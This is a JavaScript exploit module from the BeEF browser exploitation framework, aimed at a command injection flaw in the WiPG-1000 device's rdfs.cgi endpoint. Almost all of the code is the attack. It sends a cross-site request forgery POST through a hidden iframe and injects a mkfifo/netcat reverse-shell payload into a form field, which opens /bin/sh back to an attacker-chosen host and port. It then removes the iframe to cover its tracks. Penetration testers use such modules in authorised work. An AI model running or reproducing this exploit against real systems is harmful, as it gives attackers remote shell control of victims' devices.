33 lines
1.2 KiB
JavaScript
33 lines
1.2 KiB
JavaScript
//
|
|
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
|
|
// Browser Exploitation Framework (BeEF) - https://beefproject.com
|
|
// See the file 'doc/COPYING' for copying permission
|
|
//
|
|
|
|
beef.execute(function() {
|
|
var rhost = '<%= @rhost %>';
|
|
var rport = '<%= @rport %>';
|
|
var lhost = '<%= @lhost %>';
|
|
var lport = '<%= @lport %>';
|
|
var timeout = 15;
|
|
|
|
var url = "http://" + rhost + ":" + rport + "/cgi-bin/rdfs.cgi";
|
|
var fifo = '/tmp/' + Math.random().toString(36).substring(7);
|
|
var payload = 'mkfifo ' + fifo + '; nc ' + lhost + ' ' + lport + ' 0<' + fifo + ' | /bin/sh >' + fifo + ' 2>&1; rm ' + fifo;
|
|
|
|
beef.debug("[WiPG-1000 Command Injection] Sending payload: " + url);
|
|
var wipg1000_cmd_injection_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(
|
|
url, 'POST', 'application/x-www-form-urlencoded', [
|
|
{'type':'hidden', 'name':'Client', 'value':';' + payload + ';'},
|
|
{'type':'hidden', 'name':'Download', 'value':'Download'}
|
|
]);
|
|
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
|
|
|
cleanup = function() {
|
|
document.body.removeChild(wipg1000_cmd_injection_iframe_<%= @command_id %>);
|
|
}
|
|
setTimeout("cleanup()", timeout*1000);
|
|
|
|
});
|
|
|